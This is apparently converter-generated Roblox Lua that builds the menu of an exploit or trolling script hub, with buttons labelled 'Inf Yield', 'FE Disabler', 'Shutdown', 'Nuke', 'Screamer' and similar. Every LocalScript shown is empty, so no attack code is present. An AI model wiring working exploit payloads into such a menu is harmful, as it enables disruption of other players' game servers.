-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["4a"] = Instance.new("UIStroke", G2L["47"]);
G2L["4a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["4b"] = Instance.new("TextButton", G2L["38"]);
G2L["4b"]["TextWrapped"] = true;
G2L["4b"]["BorderSizePixel"] = 0;
G2L["4b"]["TextSize"] = 14;
G2L["4b"]["TextScaled"] = true;
G2L["4b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4b"]["BackgroundTransparency"] = 1;
G2L["4b"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["4b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4b"]["Text"] = [[HappyHub]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["4c"] = Instance.new("LocalScript", G2L["4b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["4d"] = Instance.new("UIStroke", G2L["4b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["4e"] = Instance.new("UIStroke", G2L["4b"]);
G2L["4e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["4f"] = Instance.new("TextButton", G2L["38"]);
G2L["4f"]["TextWrapped"] = true;
G2L["4f"]["BorderSizePixel"] = 0;
G2L["4f"]["TextSize"] = 14;
G2L["4f"]["TextScaled"] = true;
G2L["4f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4f"]["BackgroundTransparency"] = 1;
G2L["4f"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["4f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4f"]["Text"] = [[RC7]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["50"] = Instance.new("LocalScript", G2L["4f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["51"] = Instance.new("UIStroke", G2L["4f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["52"] = Instance.new("UIStroke", G2L["4f"]);
G2L["52"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["53"] = Instance.new("TextButton", G2L["38"]);
G2L["53"]["TextWrapped"] = true;
G2L["53"]["BorderSizePixel"] = 0;
G2L["53"]["TextSize"] = 14;
G2L["53"]["TextScaled"] = true;
G2L["53"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["53"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["53"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["53"]["BackgroundTransparency"] = 1;
G2L["53"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["53"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["53"]["Text"] = [[KJ]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["54"] = Instance.new("LocalScript", G2L["53"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["55"] = Instance.new("UIStroke", G2L["53"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["56"] = Instance.new("UIStroke", G2L["53"]);
G2L["56"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["57"] = Instance.new("TextButton", G2L["38"]);
G2L["57"]["TextWrapped"] = true;
G2L["57"]["BorderSizePixel"] = 0;
G2L["57"]["TextSize"] = 14;
G2L["57"]["TextScaled"] = true;
G2L["57"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["57"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["57"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["57"]["BackgroundTransparency"] = 1;
G2L["57"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["57"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["57"]["Text"] = [[Nuke]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["58"] = Instance.new("LocalScript", G2L["57"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["59"] = Instance.new("UIStroke", G2L["57"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["5a"] = Instance.new("UIStroke", G2L["57"]);
G2L["5a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["5b"] = Instance.new("TextButton", G2L["38"]);
G2L["5b"]["TextWrapped"] = true;
G2L["5b"]["BorderSizePixel"] = 0;
G2L["5b"]["TextSize"] = 14;
G2L["5b"]["TextScaled"] = true;
G2L["5b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5b"]["BackgroundTransparency"] = 1;
G2L["5b"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["5b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5b"]["Text"] = [[c00lkidd music]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["5c"] = Instance.new("LocalScript", G2L["5b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["5d"] = Instance.new("UIStroke", G2L["5b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["5e"] = Instance.new("UIStroke", G2L["5b"]);
G2L["5e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["5f"] = Instance.new("TextButton", G2L["38"]);
G2L["5f"]["TextWrapped"] = true;
G2L["5f"]["BorderSizePixel"] = 0;
G2L["5f"]["TextSize"] = 14;
G2L["5f"]["TextScaled"] = true;
G2L["5f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["5f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["5f"]["BackgroundTransparency"] = 1;
G2L["5f"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["5f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5f"]["Text"] = [[Inf Yield]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["60"] = Instance.new("LocalScript", G2L["5f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["61"] = Instance.new("UIStroke", G2L["5f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["62"] = Instance.new("UIStroke", G2L["5f"]);
G2L["62"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["63"] = Instance.new("TextButton", G2L["38"]);
G2L["63"]["TextWrapped"] = true;
G2L["63"]["BorderSizePixel"] = 0;
G2L["63"]["TextSize"] = 14;
G2L["63"]["TextScaled"] = true;
G2L["63"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["63"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["63"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["63"]["BackgroundTransparency"] = 1;
G2L["63"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["63"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["63"]["Text"] = [[Silent SS]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["64"] = Instance.new("LocalScript", G2L["63"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["65"] = Instance.new("UIStroke", G2L["63"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["66"] = Instance.new("UIStroke", G2L["63"]);
G2L["66"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["67"] = Instance.new("TextButton", G2L["38"]);
G2L["67"]["TextWrapped"] = true;
G2L["67"]["BorderSizePixel"] = 0;
G2L["67"]["TextSize"] = 14;
G2L["67"]["TextScaled"] = true;
G2L["67"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["67"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["67"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["67"]["BackgroundTransparency"] = 1;
G2L["67"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["67"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["67"]["Text"] = [[l0stAdmin]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["68"] = Instance.new("LocalScript", G2L["67"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["69"] = Instance.new("UIStroke", G2L["67"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["6a"] = Instance.new("UIStroke", G2L["67"]);
G2L["6a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["6b"] = Instance.new("TextButton", G2L["38"]);
G2L["6b"]["TextWrapped"] = true;
G2L["6b"]["BorderSizePixel"] = 0;
G2L["6b"]["TextSize"] = 14;
G2L["6b"]["TextScaled"] = true;
G2L["6b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6b"]["BackgroundTransparency"] = 1;
G2L["6b"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["6b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6b"]["Text"] = [[AntiSkid]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["6c"] = Instance.new("LocalScript", G2L["6b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["6d"] = Instance.new("UIStroke", G2L["6b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["6e"] = Instance.new("UIStroke", G2L["6b"]);
G2L["6e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["6f"] = Instance.new("TextButton", G2L["38"]);
G2L["6f"]["TextWrapped"] = true;
G2L["6f"]["BorderSizePixel"] = 0;
G2L["6f"]["TextSize"] = 14;
G2L["6f"]["TextScaled"] = true;
G2L["6f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6f"]["BackgroundTransparency"] = 1;
G2L["6f"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["6f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6f"]["Text"] = [[Destroy All Sounds]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["70"] = Instance.new("LocalScript", G2L["6f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["71"] = Instance.new("UIStroke", G2L["6f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["72"] = Instance.new("UIStroke", G2L["6f"]);
G2L["72"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["73"] = Instance.new("TextButton", G2L["38"]);
G2L["73"]["TextWrapped"] = true;
G2L["73"]["BorderSizePixel"] = 0;
G2L["73"]["TextSize"] = 14;
G2L["73"]["TextScaled"] = true;
G2L["73"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["73"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["73"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["73"]["BackgroundTransparency"] = 1;
G2L["73"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["73"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["73"]["Text"] = [[Shutdown]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["74"] = Instance.new("LocalScript", G2L["73"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["75"] = Instance.new("UIStroke", G2L["73"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["76"] = Instance.new("UIStroke", G2L["73"]);
G2L["76"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["77"] = Instance.new("TextButton", G2L["38"]);
G2L["77"]["TextWrapped"] = true;
G2L["77"]["BorderSizePixel"] = 0;
G2L["77"]["TextSize"] = 14;
G2L["77"]["TextScaled"] = true;
G2L["77"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["77"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["77"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["77"]["BackgroundTransparency"] = 1;
G2L["77"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["77"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["77"]["Text"] = [[FE Disabler]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["78"] = Instance.new("LocalScript", G2L["77"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["79"] = Instance.new("UIStroke", G2L["77"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["7a"] = Instance.new("UIStroke", G2L["77"]);
G2L["7a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["7b"] = Instance.new("TextButton", G2L["38"]);
G2L["7b"]["TextWrapped"] = true;
G2L["7b"]["BorderSizePixel"] = 0;
G2L["7b"]["TextSize"] = 14;
G2L["7b"]["TextScaled"] = true;
G2L["7b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7b"]["BackgroundTransparency"] = 1;
G2L["7b"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["7b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7b"]["Text"] = [[Gojo]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["7c"] = Instance.new("LocalScript", G2L["7b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["7d"] = Instance.new("UIStroke", G2L["7b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["7e"] = Instance.new("UIStroke", G2L["7b"]);
G2L["7e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["7f"] = Instance.new("TextButton", G2L["38"]);
G2L["7f"]["TextWrapped"] = true;
G2L["7f"]["BorderSizePixel"] = 0;
G2L["7f"]["TextSize"] = 14;
G2L["7f"]["TextScaled"] = true;
G2L["7f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["7f"]["BackgroundTransparency"] = 1;
G2L["7f"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["7f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7f"]["Text"] = [[Guns]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["80"] = Instance.new("LocalScript", G2L["7f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["81"] = Instance.new("UIStroke", G2L["7f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["82"] = Instance.new("UIStroke", G2L["7f"]);
G2L["82"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["83"] = Instance.new("TextButton", G2L["38"]);
G2L["83"]["TextWrapped"] = true;
G2L["83"]["BorderSizePixel"] = 0;
G2L["83"]["TextSize"] = 14;
G2L["83"]["TextScaled"] = true;
G2L["83"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["83"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["83"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["83"]["BackgroundTransparency"] = 1;
G2L["83"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["83"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["83"]["Text"] = [[Screamer]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["84"] = Instance.new("LocalScript", G2L["83"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["85"] = Instance.new("UIStroke", G2L["83"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["86"] = Instance.new("UIStroke", G2L["83"]);
G2L["86"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["87"] = Instance.new("TextButton", G2L["38"]);
G2L["87"]["TextWrapped"] = true;
G2L["87"]["BorderSizePixel"] = 0;
G2L["87"]["TextSize"] = 14;
G2L["87"]["TextScaled"] = true;
G2L["87"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["87"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["87"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["87"]["BackgroundTransparency"] = 1;
G2L["87"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["87"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["87"]["Text"] = [[Sensation]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["88"] = Instance.new("LocalScript", G2L["87"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["89"] = Instance.new("UIStroke", G2L["87"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["8a"] = Instance.new("UIStroke", G2L["87"]);
G2L["8a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["8b"] = Instance.new("TextButton", G2L["38"]);
G2L["8b"]["TextWrapped"] = true;
G2L["8b"]["BorderSizePixel"] = 0;
G2L["8b"]["TextSize"] = 14;
G2L["8b"]["TextScaled"] = true;
G2L["8b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8b"]["BackgroundTransparency"] = 1;
G2L["8b"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["8b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8b"]["Text"] = [[Aureus]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["8c"] = Instance.new("LocalScript", G2L["8b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["8d"] = Instance.new("UIStroke", G2L["8b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["8e"] = Instance.new("UIStroke", G2L["8b"]);
G2L["8e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["8f"] = Instance.new("ImageButton", G2L["3"]);
G2L["8f"]["BorderSizePixel"] = 0;
G2L["8f"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["8f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8f"]["Image"] = [[rbxassetid://11347112400]];
G2L["8f"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["8f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8f"]["Position"] = UDim2.new(0, 0, 0.12162, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["90"] = Instance.new("LocalScript", G2L["8f"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["91"] = Instance.new("UIStroke", G2L["8f"]);



-- StarterGui.ScreenGui.Frame.ImageButton
G2L["92"] = Instance.new("ImageButton", G2L["3"]);
G2L["92"]["BorderSizePixel"] = 0;
G2L["92"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["92"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["92"]["Image"] = [[rbxassetid://11570895459]];
G2L["92"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["92"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["92"]["Position"] = UDim2.new(0, 0, 0.26689, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["93"] = Instance.new("LocalScript", G2L["92"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["94"] = Instance.new("UIStroke", G2L["92"]);



-- StarterGui.ScreenGui.Frame.ImageButton
G2L["95"] = Instance.new("ImageButton", G2L["3"]);
G2L["95"]["BorderSizePixel"] = 0;
G2L["95"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["95"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["95"]["Image"] = [[rbxassetid://1365082776]];
G2L["95"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["95"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["95"]["Position"] = UDim2.new(0, 0, 0.41216, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["96"] = Instance.new("LocalScript", G2L["95"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["97"] = Instance.new("UIStroke", G2L["95"]);



-- StarterGui.ScreenGui.Frame.page4
G2L["98"] = Instance.new("Frame", G2L["3"]);
G2L["98"]["Visible"] = false;
G2L["98"]["BorderSizePixel"] = 0;
G2L["98"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["98"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["98"]["Position"] = UDim2.new(0.11302, 0, 0.12162, 0);
G2L["98"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["98"]["Name"] = [[page4]];
G2L["98"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page4.ScrollingFrame
G2L["99"] = Instance.new("ScrollingFrame", G2L["98"]);
G2L["99"]["Active"] = true;
G2L["99"]["BorderSizePixel"] = 0;
G2L["99"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["99"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["99"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["99"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["99"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["99"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["99"]["ScrollBarThickness"] = 3;
G2L["99"]["BackgroundTransparency"] = 1;


-- StarterGui.ScreenGui.Frame.page4.ScrollingFrame.LocalScript
G2L["9a"] = Instance.new("LocalScript", G2L["99"]);



-- StarterGui.ScreenGui.Frame.page4.ScrollingFrame.UIListLayout
G2L["9b"] = Instance.new("UIListLayout", G2L["99"]);
G2L["9b"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.ImageButton
G2L["9c"] = Instance.new("ImageButton", G2L["3"]);
G2L["9c"]["BorderSizePixel"] = 0;
G2L["9c"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["9c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["9c"]["Image"] = [[rbxassetid://101630023371308]];
G2L["9c"]["Size"] = UDim2.new(0, 43, 0, 43);
G2L["9c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9c"]["Position"] = UDim2.new(0, 0, 0.55743, 0);


-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
G2L["9d"] = Instance.new("LocalScript", G2L["9c"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["9e"] = Instance.new("UIStroke", G2L["9c"]);



-- StarterGui.ScreenGui.Frame.ImageButton.UIStroke
G2L["9f"] = Instance.new("UIStroke", G2L["9c"]);
G2L["9f"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page5
G2L["a0"] = Instance.new("Frame", G2L["3"]);
G2L["a0"]["Visible"] = false;
G2L["a0"]["BorderSizePixel"] = 0;
G2L["a0"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["a0"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["a0"]["Position"] = UDim2.new(0.10565, 0, 0.12162, 0);
G2L["a0"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a0"]["Name"] = [[page5]];
G2L["a0"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page5.TextLabel
G2L["a1"] = Instance.new("TextLabel", G2L["a0"]);
G2L["a1"]["TextWrapped"] = true;
G2L["a1"]["BorderSizePixel"] = 0;
G2L["a1"]["TextSize"] = 14;
G2L["a1"]["TextScaled"] = true;
G2L["a1"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a1"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["a1"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a1"]["BackgroundTransparency"] = 1;
G2L["a1"]["Size"] = UDim2.new(0, 200, 0, 25);
G2L["a1"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a1"]["Text"] = [[Settings]];
G2L["a1"]["Position"] = UDim2.new(0.22161, 0, 0, 0);


-- StarterGui.ScreenGui.Frame.page5.TextLabel.UIStroke
G2L["a2"] = Instance.new("UIStroke", G2L["a1"]);



